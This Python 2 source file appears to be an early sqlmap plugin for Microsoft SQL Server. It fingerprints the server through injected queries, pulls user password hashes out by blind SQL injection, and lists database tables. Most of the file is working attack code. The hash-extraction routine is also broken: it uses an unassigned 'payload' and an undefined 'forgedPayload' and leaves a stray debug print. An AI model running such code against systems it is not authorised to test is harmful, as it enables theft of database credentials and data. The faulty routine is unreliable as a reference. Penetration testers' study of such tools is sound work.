#!/usr/bin/env python


import random
import sys
import time

from sqlmap.parser import bannerParser
from sqlmap.query import QueryMap
from sqlmap.settings import MSSQL_SYSTEM_DBS
from sqlmap.settings import MSSQL_XML


class MSSQLServerMap(QueryMap):
    """
    This class defines Microsoft SQL Server methods

    @author: Bernardo Damele
    """

    def __init__(self, args):
        QueryMap.__init__(self, args, "Microsoft SQL Server")


    def unescape(self, expression):
        while True:
            index = expression.find("'")
            if index == -1:
                break

            firstIndex = index + 1
            index = expression[firstIndex:].find("'")

            if index == -1:
                raise Exception, "Unenclosed ' in '%s'" % expression

            lastIndex = firstIndex + index
            old = "'%s'" % expression[firstIndex:lastIndex]
            unescaped = "("

            for i in range(firstIndex, lastIndex):
                unescaped += "CHAR(%d)" % (ord(expression[i]))
                if i < lastIndex - 1:
                    unescaped += "+"

            unescaped += ")"
            expression = expression.replace(old, unescaped)

        return expression


    def getFingerprint(self):
        if not self.args.exaustiveFp:
            return "Microsoft SQL Server"

        actVer = self.parseFp("Microsoft SQL Server", self.fingerprint)

        blank = " " * 16
        value = "active fingerprint: %s" % actVer

        if self.banner:
            release, version, servicepack = bannerParser(self.banner, MSSQL_XML)

            if release and version and servicepack:
                banVer  = "Microsoft SQL Server %s " % release
                banVer += "Service Pack %s " % servicepack
                banVer += "version %s" % version

                value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

        self.passiveFuzzing()
        htmlParsed = self.getHtmlErrorFp()

        if htmlParsed:
            value += "\n%shtml error message fingerprint: %s" % (blank, htmlParsed)

        return value


    def checkDbms(self):
        if self.args.dbms in ("microsoft sql server", "mssql"):
            self.setDbms("Microsoft SQL Server")

            if not self.args.exaustiveFp:
                return True

        logMsg = "testing Microsoft SQL Server"
        self.logger.info(logMsg)

        randInt = str(random.randint(1, 9))
        query = "LTRIM(STR(LEN(%s)))" % randInt

        if self.getValue(query) == "1":
            self.setDbms("Microsoft SQL Server")

            if not self.args.exaustiveFp:
                return True

            query = "SELECT SUBSTRING((@@VERSION), 26, 1)"
            version = self.getValue(query)

            if version == "5":
                self.fingerprint = ["2005"]
            elif version == "0":
                self.fingerprint = ["2000"]
            else:
                self.fingerprint = ["< 2000"]

                return False

            if self.args.getBanner:
                self.banner = self.getValue("@@VERSION")

            return True
        else:
            warnMsg = "the remote DMBS is not Microsoft SQL Server"
            self.logger.warn(warnMsg)

            return False


    def getPasswordHashes(self):
        logMsg = "fetching database users password hashes"
        self.logger.info(logMsg)

        rootQuery = self.dbmsQueries["passwords"]

        if self.args.unionUse:
            message  = "Microsoft SQL Server plugin does not fully support "
            message += "password hashes retriving through UNION query, do "
            message += "you really want to perform it? [y/N] "
            test = raw_input("[%s] [INPUT] %s" % (time.strftime("%X"), message))

            if test and test[0] in ("y", "Y"):
                query = rootQuery["inband"]["query"]
                value = self.getValue(query, blind=False)

                if value:
                    for user, password in value:
                        if not self.cachedUsersPassword.has_key(user):
                            self.cachedUsersPassword[user] = [password]
                        else:
                            self.cachedUsersPassword[user].append(password)
            else:
                message  = "Do you want to retrieve users password hashes "
                message += "through blind SQL injection? [Y/n] "
                test = raw_input("[%s] [INPUT] %s" % (time.strftime("%X"), message))

                if not test or test[0] in ("y", "Y"):
                    pass
                else:
                    return {}

        if not self.cachedUsersPassword:
            if not self.cachedUsers:
                self.cachedUsers = self.getUsers()

            for user in self.cachedUsers:
                logMsg  = "fetching number of password hashes "
                logMsg += "for user '%s'" % user
                self.logger.info(logMsg)

                query = rootQuery["blind"]["count"] % user
                count = self.getValue(query, inband=False)

                if not len(count) or count == "0":
                    warnMsg  = "unable to retrieve the number of password "
                    warnMsg += "hashes for user '%s'" % user
                    self.logger.warn(warnMsg)
                    continue

                logMsg = "fetching password hashes for user '%s'" % user
                self.logger.info(logMsg)

                if self.args.verbose == 1 and not self.args.eta:
                    logMsg = "[%s] [INFO] retrieved: "
                    sys.stdout.write(logMsg % time.strftime("%X"))
                    sys.stdout.flush()

                passwords = []

                for index in range(int(count)):
                    hexadecimalString = ""
                    decimalList = []

                    for i in range(3, 47):
                        decimalString = ""

                        for j in range(1, 4):
                            query = rootQuery["blind"]["query"] % (i, j, user)

                            for k in range(0, 10):
                                query = " %s = \'%d\'" % (query, k)
                                query = self.injectionQuery("%s"               % query,
                                                            "%s AND '1'='1"    % query,
                                                            "%s AND \"1\"=\"1" % query)
                                payload = self.payload(newValue=payload)
                                result = self.queryPage(forgedPayload)

                                if result == self.args.defaultResult:
                                    charK = str(k).upper()
                                    decimalString += charK

                                    if self.args.verbose == 1 and not self.args.eta:
                                        sys.stdout.write(charK)
                                        sys.stdout.flush()

                                    break

                        decimalList.append(int(decimalString))

                    if self.args.verbose == 1 and not self.args.eta:
                        logMsg  = "\n[%s] [INFO] converting the password "
                        logMsg += "integer to its hexadecimal value\n"
                        sys.stdout.write(logMsg % time.strftime("%X"))
                        sys.stdout.flush()

                    for decimalNum in decimalList:
                        hexadecimalNum = "%2x" % decimalNum
                        hexadecimalString += hexadecimalNum

                    hexadecimalString = hexadecimalString.replace(" ", "0")
                    hexadecimalString = hexadecimalString.upper()

                    blank = " " * 8
                    password  = "\n%sassembled hash:\t0x0100%s\n" % (blank, hexadecimalString)
                    password += "%sheader:\t\t0x0100\n" % blank
                    password += "%ssalt:\t\t%s\n" % (blank, hexadecimalString[:8])
                    password += "%smixedcase:\t%s\n" % (blank, hexadecimalString[8:48])
                    password += "%suppercase:\t%s" % (blank, hexadecimalString[48:])
                    print len(hexadecimalString)
                    passwords.append(password)

                if passwords:
                    self.cachedUsersPassword[user] = passwords
                else:
                    warnMsg  = "unable to retrieve the password "
                    warnMsg += "hashes for user '%s'" % user
                    self.logger.warn(warnMsg)

        if not self.cachedUsersPassword:
            errMsg  = "unable to retrieve the password "
            errMsg += "hashes for the database users"
            raise Exception, errMsg

        return self.cachedUsersPassword


    def getTables(self):
        logMsg = "fetching tables"
        if self.args.db:
            logMsg += " for database '%s'" % self.args.db
        self.logger.info(logMsg)

        rootQuery = self.dbmsQueries["tables"]

        if not self.args.db:
            if not len(self.cachedDbs):
                dbs = self.getDbs()
            else:
                dbs = self.cachedDbs
        else:
            if "," in self.args.db:
                dbs = self.args.db.split(",")
            else:
                dbs = [self.args.db]

        if self.args.unionUse:
            for db in dbs:
                if self.args.excludeSysDbs and db in MSSQL_SYSTEM_DBS:
                    logMsg = "skipping system database '%s'" % db
                    self.logger.info(logMsg)

                    continue

                query = rootQuery["inband"]["query"] % db
                value = self.getValue(query, blind=False)

                if value:
                    self.cachedTables[db] = value

        if not self.cachedTables:
            for db in dbs:
                if self.args.excludeSysDbs and db in MSSQL_SYSTEM_DBS:
                    logMsg = "skipping system database '%s'" % db
                    self.logger.info(logMsg)

                    continue

                logMsg  = "fetching number of tables for "
                logMsg += "database '%s'" % db
                self.logger.info(logMsg)

                query = rootQuery["blind"]["count"] % db
                count = self.getValue(query, inband=False)

                if not len(count) or count == "0":
                    warnMsg  = "unable to retrieve the number of "
                    warnMsg += "tables for database '%s'" % db
                    self.logger.warn(warnMsg)
                    continue

                tables = []

                for index in range(int(count)):
                    query = rootQuery["blind"]["query"] % (db, index, db)
                    table = self.getValue(query, inband=False)
                    tables.append(table)

                if tables:
                    self.cachedTables[db] = tables
                else:
                    warnMsg  = "unable to retrieve the tables "
                    warnMsg += "for database '%s'" % db
                    self.logger.warn(warnMsg)

        if not self.cachedTables:
            errMsg = "unable to retrieve the tables for any database"
            raise Exception, errMsg

        return self.cachedTables

